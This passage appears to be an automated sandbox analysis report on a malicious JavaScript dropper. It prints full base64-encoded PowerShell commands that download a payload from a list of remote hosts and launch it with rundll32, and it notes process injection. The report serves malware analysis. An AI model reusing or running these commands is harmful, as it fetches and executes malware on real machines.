B1AEEARABFAEEATwBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAGgAZQBtAG8AbQBlAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEASABNAEEAWgBRAEIAMQBBAEcAUQBBAGIAdwBCAGoAQQBHAGcAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAegBBAEgAUQBBAGEAQQBCAGwAQQBIAE0AQQBhAFEAQgBoAEEARQBVAEEAYQBRAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAWQBRAEIAaQBBAEEAPQA9ACIAOwB9AH0AJABlAHAAaQBzAHQAbwBtAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAQQBCAGgAQQBHAGMAQQBhAFEAQgB2AEEASABBAEEAWQBRAEIAMABBAEcARQBBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQgBXAEEARwBFAEEAWgB3AEIAaABBAEgASQBBAGEAUQBCAGgAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAWQBRAEIAdABBAEcAOABBAGIAZwBCAGsAQQBIAE0AQQBnAGsATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQARQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEAMABBAEEAPQA9AGcAawBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGMAZwBCAHMAQQBHAGsAQQBjAHcAQgB0AEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQQB1AEEARwBZAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQAiADsAJABOAG8AbgBzAHAAZQBjAGkAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAG0AQQBHAEUAQQBhAFEAQgAwAEEARwBnAEEAIgA7AA=="
parent_process	wscript.exe	martian_process	powershell -encodedcommand "JABOAG8AbgBkAGUAeAB0AGUAcgBpAHQAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAagBBAEgAVQBBAGQAQQBCAHAAQQBHAE0AQQBiAEEAQgBsAEEARQAwAEEAWQBRAEIAeQBBAEcASQBBAGIAQQBCADUAQQBDADQAQQBiAGcAQgB5AEEASABjAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADIAQQBEAFkAQQBMAGcAQQAzAEEARABRAEEATABnAEEAeABBAEQATQBBAE4AZwBBAHUAQQBEAEUAQQBOAHcAQQA1AEEAQQA9AD0AbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFEAQQBOAEEAQQB1AEEARABFAEEATgB3AEEAeABBAEMANABBAE4AZwBBAHoAQQBDADQAQQBNAGcAQQB5AEEARABNAEEAbQBRAEwAWQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHoAQQBHAFUAQQBiAFEAQgBwAEEARwA0AEEAYgB3AEIAeQBBAEcAMABBAFkAUQBCAHMAQQBHADQAQQBaAFEAQgB6AEEASABNAEEAVQBBAEIAcwBBAEcARQBBAFkAdwBCAHYAQQBHAFEAQQBaAFEAQgB5AEEARwAwAEEAYQBRAEEAdQBBAEcANABBAFkAUQBCAG4AQQBHADgAQQBlAFEAQgBoAEEAQQA9AD0AIgA7ACQAUAByAG8AZAB1AGMAdABpAG8AbgBhAGwAUABhAHMAdABpAGwAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBjAGcAQgBsAEEARwB3AEEAYQBRAEIAdQBBAEcAYwBBAGIAQQBCADUAQQBFAEUAQQBiAGcAQgAwAEEARwBrAEEAYgB3AEIAdwBBAEcAawBBAGQAUQBCAHQAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAdgBBAEcARQBBAFkAdwBCAG8AQQBBAD0APQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQASQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQB3AEEAQwA0AEEATgBnAEEANQBBAEMANABBAE0AUQBBADEAQQBEAEkAQQAiADsAJABkAHIAbwBuAGUAcABpAHAAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFkAUQBCADAAQQBIAEkAQQBhAFEAQgBqAEEASABVAEEAYgBBAEIAaABBAEMANABBAFoAUQBCAHQAQQBHAEUAQQBhAFEAQgBzAEEAQQA9AD0AWgBrAEwAdgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEEAQQBMAGcAQQAwAEEARABNAEEATABnAEEANABBAEQAawBBAEwAZwBBAHkAQQBEAFEAQQBOAFEAQQA9AFoAawBMAHYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAegBBAEgAUQBBAFoAUQBCAGgAQQBHAFEAQQBhAFEAQgB1AEEARwBVAEEAYwB3AEIAegBBAEMANABBAFoAdwBCAHkAQQBHAGsAQQBjAEEAQgBsAEEAQQA9AD0AIgA7ACQAcgB1AG4AbgBlAHQAVQBuAGQAZQBuAHUAbgBjAGkAYQB0AG8AcgB5ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATQBnAEEAdQBBAEQAUQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATgB3AEEAeQBBAEEAPQA9AGYAWABNAFQAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBNAEEAYQBRAEIAMgBBAEcAawBBAGIAQQBCAGwAQQBDADQAQQBlAGcAQgBoAEEAQQA9AD0AZgBYAE0AVABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAEUAQQBiAFEAQgBwAEEASABJAEEAWQBRAEIAdQBBAEcAZwBBAFkAUQBBAHUAQQBIAFEAQQBhAFEAQgBsAEEARwA0AEEAWgBBAEIAaABBAEEAPQA9ACIAOwAkAG0AYQBjAHIAbwBzAGUAaQBzAG0AaQBjACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE8AUQBBADIAQQBDADQAQQBNAGcAQQB5AEEARABnAEEATABnAEEAMwBBAEQAVQBBAEwAdwBBAHoAQQBGAE0AQQBSAGcAQgAwAEEAQwA4AEEAUwBRAEIAUQBBAEQAWQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEANQBBAEQAVQBBAEwAdwBCAHoAQQBDADgAQQBlAGcAQgBWAEEASABrAEEATgBnAEEAegBBAEEAPQA9AE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAyAEEARABjAEEATABnAEEAeQBBAEQAUQBBAE0AdwBBAHUAQQBEAGcAQQBOAEEAQQB1AEEARABJAEEATQBnAEEAMQBBAEMAOABBAFQAZwBBADIAQQBFAHcAQQBUAFEAQgBDAEEAQwA4AEEAUgBBAEIAdABBAEUAWQBBAGUAUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBWAEEARwA0AEEAYgBRAEEAeQBBAEcAWQBBAGUAQQBCAFkAQQBGAGcAQQBWAGcAQgBoAEEARABjAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBPAFEAQQB5AEEAQwA4AEEAUwBnAEIAVQBBAEcAawBBAEwAdwBCAFoAQQBFAGMAQQBNAFEAQgBSAEEARgBZAEEAWgBnAEEAMwBBAEUAbwBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEUAWQBBAGQAUQBCAFAAQQBEAGcAQQBlAFEAQQA0AEEASABrAEEAZQBBAEEAPQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABHAGwAaQB0AHQAZQByACAAaQBuACAAJABtAGEAYwByAG8AcwBlAGkAcwBtAGkAYwAgAC0AcwBwAGwAaQB0ACAAIgBOACIAKQAgAHsAJABSAGUAdABhAGMAawBsAGUAUwBoAGEAaABhAHIAaQB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE8AUQBBAHUAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBRAEEAdwBBAEQAQQBBAGwAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQAwAEEAZABRAEIAdQBBAEcANABBAGIAdwBCAHcAQQBIAE0AQQBhAFEAQgBrAEEARwBFAEEAWgBRAEEAdQBBAEcATQBBAGIAQQBCAGgAQQBHAGsAQQBiAFEAQgB6AEEAQQA9AD0AbABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAEkAQQBiAGcAQgBwAEEASABRAEEAYQBBAEIAdgBBAEcASQBBAGEAUQBCAHYAQQBHAGMAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAcABBAEcATQBBAFkAUQBCAHMAQQBDADQAQQBjAFEAQgAxAEEARwBVAEEAWQBnAEIAbABBAEcATQBBACIAOwB0AHIAeQAgAHsAJABkAGkAcwByAG8AbwB0AFQAaQBtAG8AYwByAGEAdABpAGMAYQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBADAAQQBDADQAQQBPAFEAQQA0AEEAQwA0AEEATQBnAEEAegBBAEQAQQBBAHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQB1AEEARABnAEEATQBRAEEAdQBBAEQAYwBBAE4AdwBBAD0AeABvAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA1AEEARABRAEEATABnAEEAeABBAEQAVQBBAE0AdwBBAHUAQQBEAEUAQQBNAFEAQQAxAEEAQwA0AEEATgBnAEEAMABBAEEAPQA9AHgAbwBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE4AZwBBAHUAQQBEAEkAQQBNAFEAQQB6AEEAQwA0AEEATwBBAEEAMgBBAEMANABBAE4AdwBBADMAQQBBAD0APQAiADsAJABoAGUAbABpAG8AdAByAG8AcABlAFMAdABlAHIAaQBsAGkAegBpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABHAGwAaQB0AHQAZQByACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAaABlAGwAaQBvAHQAcgBvAHAAZQBTAHQAZQByAGkAbABpAHoAaQBuAGcAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAUAByAGUAZQB4AHAAbABvAGQAaQBuAGcALgBHAGUAbwBjAGgAZQBtAGkAYwBhAGwAOwAkAEEAcABwAG8AcgB0AGkAbwBuAGUAZABBAHMAdAByAG8AYwB5AHQAbwBtAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFUAQQBiAGcAQgBwAEEARwBZAEEAYQBRAEIAbABBAEcAUQBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBWAEEARwA0AEEAYwB3AEIAMABBAEcAVQBBAGQAdwBCAGgAQQBIAEkAQQBaAEEAQgBzAEEARwBrAEEAYQB3AEIAbABBAEMANABBAFoAUQBCAGgAQQBIAEkAQQBkAEEAQgBvAEEAQQA9AD0AdABKAFYAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAYgBnAEIAbQBBAEgASQBBAGQAUQBCAHAAQQBIAFEAQQBaAGcAQgAxAEEARwB3AEEAYgBBAEIANQBBAEMANABBAFkAZwBCAHYAQQBIAFUAQQBkAEEAQgBwAEEASABFAEEAZABRAEIAbABBAEEAPQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQAyAEEAQwA0AEEATQBnAEEAeQBBAEQARQBBAEwAZwBBAHkAQQBEAEkAQQBOAFEAQQA9AHQASgBWAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARABBAEgAawBBAGMAdwBCADAAQQBHADgAQQBiAEEAQgBwAEEASABRAEEAYQBBAEEAdQBBAEcATQBBAGIAdwBCAGgAQQBHAE0AQQBhAEEAQQA9ACIAOwAkAEcAcgBvAHcAbABlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAGMAQQBjAGcAQgBwAEEARwBjAEEAWgB3AEIAcwBBAEcAawBBAFoAUQBCAHkAQQBDADQAQQBZAHcAQgA1AEEARwAwAEEAYwBnAEIAMQBBAEEAPQA9AFoAWgBVAHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANABBAEMANABBAE0AUQBBADQAQQBEAE0AQQBMAGcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AQQBBAHoAQQBBAD0APQAiADsAJABQAG8AbAB5AG0AbwBsAHkAYgBkAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEASABVAEEAWQBnAEIAdwBBAEgASQBBAGIAdwBCAG0AQQBHAFUAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEcARQBBAGIAQQBCAFQAQQBHAEUAQQBhAFEAQgB1AEEASABRAEEAYgBBAEIANQBBAEMANABBAGMAdwBCADEAQQBIAEEAQQBjAEEAQgB2AEEASABJAEEAZABBAEEAPQBXAEMAZgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQA1AEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATwBRAEEANQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFAAcgBlAGUAeABwAGwAbwBkAGkAbgBnAC4ARwBlAG8AYwBoAGUAbQBpAGMAYQBsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAwADEAMgA2ADYAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAEEAQQBjAGcAQgBsAEEARwBVAEEAZQBBAEIAdwBBAEcAdwBBAGIAdwBCAGsAQQBHAGsAQQBiAGcAQgBuAEEAQwA0AEEAUgB3AEIAbABBAEcAOABBAFkAdwBCAG8AQQBHAFUAQQBiAFEAQgBwAEEARwBNAEEAWQBRAEIAcwBBAEMAdwBBAGQAZwBCAHAAQQBIAEEAQQBjAHcAQQA3AEEARQAwAEEAUwBRAEIAVQBBAEUAdwBBAGEAUQBCAGoAQQBHAFUAQQBiAGcAQgB6AEEARwBVAEEAIgA7ACQASQBtAG0AbwByAHQAYQBsAGkAegBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQAUQBBAEwAZwBBAHgAQQBEAEUAQQBOAHcAQQB1AEEARABFAEEATwBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFUAQQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewAkAGgAZQBtAG8AbQBlAHQAZQByACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB3AEEASABNAEEAWgBRAEIAMQBBAEcAUQBBAGIAdwBCAGoAQQBHAGcAQQBjAGcAQgB2AEEARwAwAEEAWgBRAEIAegBBAEgAUQBBAGEAQQBCAGwAQQBIAE0AQQBhAFEAQgBoAEEARQBVAEEAYQBRAEIAawBBAEcAVQBBAGIAZwBCADAAQQBHAHcAQQBlAFEAQQB1AEEARwBNAEEAWQBRAEIAaQBBAEEAPQA9ACIAOwB9AH0AJABlAHAAaQBzAHQAbwBtAGEAbAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGIAQQBCAGgAQQBHAGMAQQBhAFEAQgB2AEEASABBAEEAWQBRAEIAMABBAEcARQBBAFoAdwBCAHAAQQBIAFUAQQBiAFEAQgBXAEEARwBFAEEAWgB3AEIAaABBAEgASQBBAGEAUQBCAGgAQQBHADQAQQBMAGcAQgBrAEEARwBrAEEAWQBRAEIAdABBAEcAOABBAGIAZwBCAGsAQQBIAE0AQQBnAGsATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQARQBBAEwAZwBBAHgAQQBEAEEAQQBOAEEAQQB1AEEARABJAEEATgBBAEEAMABBAEEAPQA9AGcAawBOAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbgBBAEcAawBBAGMAZwBCAHMAQQBHAGsAQQBjAHcAQgB0AEEARgBJAEEAWQBRAEIAawBBAEcAawBBAGIAdwBCAHUAQQBHAGsAQQBZAHcAQQB1AEEARwBZAEEAYQBRAEIAegBBAEcAZwBBAGEAUQBCAHUAQQBHAGMAQQAiADsAJABOAG8AbgBzAHAAZQBjAGkAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGgAQQBHAFUAQQBjAGcAQgBoAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEwAZwBCAG0AQQBHAEUAQQBhAFEAQgAwAEEARwBnAEEAIgA7AA=="
parent_process	wscript.exe	martian_process	wscript "C:\ProgramData\Uncoupler.js" Superornamentally sapphicSloggers Tencteri
parent_process	wscript.exe	martian_process	"C:\Windows\System32\wscript.exe" "C:\ProgramData\Uncoupler.js" Superornamentally sapphicSloggers Tencteri

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1460 resumed a thread in remote process 2560
Process injection	Process 2560 resumed a thread in remote process 2680
NtResumeThread May 24, 2023, 11:05 a.m.	thread_handle: 0x0000030c suspend_count: 1 process_identifier: 2560	1	0	0
NtResumeThread May 24, 2023, 11:05 a.m.	thread_handle: 0x00000304 suspend_count: 1 process_identifier: 2680	1	0	0

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\SysWOW64\wscript.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

untrimming.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All